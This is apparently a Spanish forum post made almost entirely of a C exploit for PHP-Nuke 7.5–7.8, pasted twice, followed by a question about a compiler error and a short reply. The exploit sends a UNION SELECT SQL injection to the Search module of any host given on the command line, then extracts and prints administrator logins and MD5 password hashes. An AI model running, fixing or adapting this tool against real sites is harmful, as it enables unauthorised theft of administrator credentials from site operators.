Autor
Código:
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#define PORT 80
#define BUFLEN 10000
#define DATA "query=p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*" // */ */
#define U " ____ ____ __ \n"
#define L "| | | | | | | / \n"
#define A "| | | | | |___/ \\ \n"
#define B "| | --- | |----| | \\ \\ \n"
#define S "|____| |____ | | |____| __/ \n\n"
void usage(char *argv[]);
void sqlinj(char *host, char *dir);
char *md5pass(char *buffer, char *s, bool test);
int main(int argc, char *argv[])
{
if( argc != 3 )
{
usage(argv);
exit(EXIT_FAILURE);
}
printf(U L A B S);
printf("\n");
printf("[~] Sending sql injection...\n");
sqlinj(argv[1], argv[2]);
return 0;
}
void usage(char *argv[])
{
printf("\n##############################################\n");
printf("# #\n");
printf("# [ Untruth Labs ] #\n");
printf("# #\n");
printf("# presents #\n");
printf("# #\n");
printf("# PHP-Nuke 7.5 to 7.8 sql injection #\n");
printf("# #\n");
printf("# coded by unitedbr #\n");
printf("##############################################\n\n");
printf("Usage:\n"
"%s [target] [dir]\n\n"
"Example:\n"
"%s www.target.com /dir/\n"
"%s www.target.com /\n", argv[0], argv[0], argv[0]);
exit(EXIT_SUCCESS);
}
void sqlinj(char *host, char *dir)
{
char buffer[BUFLEN];
sprintf( buffer, "POST %smodules.php?name=Search HTTP/1.0\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n%s\n\n\n", dir, host, strlen(DATA), DATA);
WSADATA wsaData;
/* Winsock start up */
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
printf("\n[-] Error at WSAStartup()\n");
exit(EXIT_FAILURE);
}
/* Create socket */
SOCKET my_sock;
my_sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if( my_sock == INVALID_SOCKET )
{
printf("\n[-] Error creating socket: %ld\n", WSAGetLastError() );
WSACleanup();
exit(EXIT_FAILURE);
}
struct hostent *he;
struct sockaddr_in addr;
/* getting the ip address */
he = gethostbyname(host);
if( he == NULL )
{
printf("\n[-] Can't resolve ip address \"%s\"\n", host);
exit(EXIT_FAILURE);
}
memset(&addr, 0, sizeof(addr));
memcpy((char*)&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
/* connecting */
if( connect(my_sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
{
printf("\n[-] Can't connect to %s\n", host);
WSACleanup();
exit(EXIT_FAILURE);
}
printf("[~] Connected and exploiting...\n");
if( send(my_sock, buffer, sizeof(buffer), 0) < 0 )
{
printf("\n[-] Can't send socket...\n");
exit(EXIT_FAILURE);
}
memset(buffer,0, sizeof(buffer));
char *s = NULL;
bool test = false, onetime = true;
printf("[~] Trying to get the md5 passwords...\n\n");
while( recv(my_sock, buffer, sizeof(buffer), 0) )
{
while( (s = strstr(buffer, "article&sid=1\"><b>")) != NULL )
{
test = true;
s = md5pass(buffer, s, onetime);
onetime = false;
}
}
if(!test)
printf("Oooopz... Can't find md5 passwords :\\\n");
WSACleanup();
closesocket(my_sock);
}
char *md5pass(char *buffer, char *s, bool onetime)
{
int pos = 0, pos1 = 0, pos2 = 0;
int i = 0, j = 0;
char *str = NULL;
if(onetime)
printf("\n--[ md5 hash passwords\n\n");
if( (s = strstr(buffer, "amp;username=")) != NULL )
{
if( (str = strstr(s, "\">")) != NULL )
{
pos1 = str - s + 1;
}
printf("login: ");
for(i = 13; i < pos1-1; i++)
{
printf("%c", s[i]);
}
printf("\n");
}
if( (s = strstr(buffer, "article&sid=1\"><b>")) != NULL )
{
if( (str = strstr(s, "</b>")) != NULL )
{
pos2 = str - s + 1;
}
printf("md5 password: ");
for(i = 18; i < pos2-1; i++)
{
printf("%c", s[i]);
}
printf("\n\n");
}
//printf("\npos2 = %d\n", pos2);
for(i = 0, j = 260; s[i] != NULL; i++, j++)
{
s[i] = s[j];
}
return s;
}
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#include <winsock2.h>
#define PORT 80
#define BUFLEN 10000
#define DATA "query=p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*" // */ */
#define U " ____ ____ __ \n"
#define L "| | | | | | | / \n"
#define A "| | | | | |___/ \\ \n"
#define B "| | --- | |----| | \\ \\ \n"
#define S "|____| |____ | | |____| __/ \n\n"
void usage(char *argv[]);
void sqlinj(char *host, char *dir);
char *md5pass(char *buffer, char *s, bool test);
int main(int argc, char *argv[])
{
if( argc != 3 )
{
usage(argv);
exit(EXIT_FAILURE);
}
printf(U L A B S);
printf("\n");
printf("[~] Sending sql injection...\n");
sqlinj(argv[1], argv[2]);
return 0;
}
void usage(char *argv[])
{
printf("\n##############################################\n");
printf("# #\n");
printf("# [ Untruth Labs ] #\n");
printf("# #\n");
printf("# presents #\n");
printf("# #\n");
printf("# PHP-Nuke 7.5 to 7.8 sql injection #\n");
printf("# #\n");
printf("# coded by unitedbr #\n");
printf("##############################################\n\n");
printf("Usage:\n"
"%s [target] [dir]\n\n"
"Example:\n"
"%s www.target.com /dir/\n"
"%s www.target.com /\n", argv[0], argv[0], argv[0]);
exit(EXIT_SUCCESS);
}
void sqlinj(char *host, char *dir)
{
char buffer[BUFLEN];
sprintf( buffer, "POST %smodules.php?name=Search HTTP/1.0\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n%s\n\n\n", dir, host, strlen(DATA), DATA);
WSADATA wsaData;
/* Winsock start up */
int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
if ( iResult != NO_ERROR )
{
printf("\n[-] Error at WSAStartup()\n");
exit(EXIT_FAILURE);
}
/* Create socket */
SOCKET my_sock;
my_sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if( my_sock == INVALID_SOCKET )
{
printf("\n[-] Error creating socket: %ld\n", WSAGetLastError() );
WSACleanup();
exit(EXIT_FAILURE);
}
struct hostent *he;
struct sockaddr_in addr;
/* getting the ip address */
he = gethostbyname(host);
if( he == NULL )
{
printf("\n[-] Can't resolve ip address \"%s\"\n", host);
exit(EXIT_FAILURE);
}
memset(&addr, 0, sizeof(addr));
memcpy((char*)&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
/* connecting */
if( connect(my_sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)
{
printf("\n[-] Can't connect to %s\n", host);
WSACleanup();
exit(EXIT_FAILURE);
}
printf("[~] Connected and exploiting...\n");
if( send(my_sock, buffer, sizeof(buffer), 0) < 0 )
{
printf("\n[-] Can't send socket...\n");
exit(EXIT_FAILURE);
}
memset(buffer,0, sizeof(buffer));
char *s = NULL;
bool test = false, onetime = true;
printf("[~] Trying to get the md5 passwords...\n\n");
while( recv(my_sock, buffer, sizeof(buffer), 0) )
{
while( (s = strstr(buffer, "article&sid=1\"><b>")) != NULL )
{
test = true;
s = md5pass(buffer, s, onetime);
onetime = false;
}
}
if(!test)
printf("Oooopz... Can't find md5 passwords :\\\n");
WSACleanup();
closesocket(my_sock);
}
char *md5pass(char *buffer, char *s, bool onetime)
{
int pos = 0, pos1 = 0, pos2 = 0;
int i = 0, j = 0;
char *str = NULL;
if(onetime)
printf("\n--[ md5 hash passwords\n\n");
if( (s = strstr(buffer, "amp;username=")) != NULL )
{
if( (str = strstr(s, "\">")) != NULL )
{
pos1 = str - s + 1;
}
printf("login: ");
for(i = 13; i < pos1-1; i++)
{
printf("%c", s[i]);
}
printf("\n");
}
if( (s = strstr(buffer, "article&sid=1\"><b>")) != NULL )
{
if( (str = strstr(s, "</b>")) != NULL )
{
pos2 = str - s + 1;
}
printf("md5 password: ");
for(i = 18; i < pos2-1; i++)
{
printf("%c", s[i]);
}
printf("\n\n");
}
//printf("\npos2 = %d\n", pos2);
for(i = 0, j = 260; s[i] != NULL; i++, j++)
{
s[i] = s[j];
}
return s;
}
¿ Me puede decir alguien porque el compilador me saca un error ? Cawento..
En línea
hasta lo puedes hacer sin exploit.
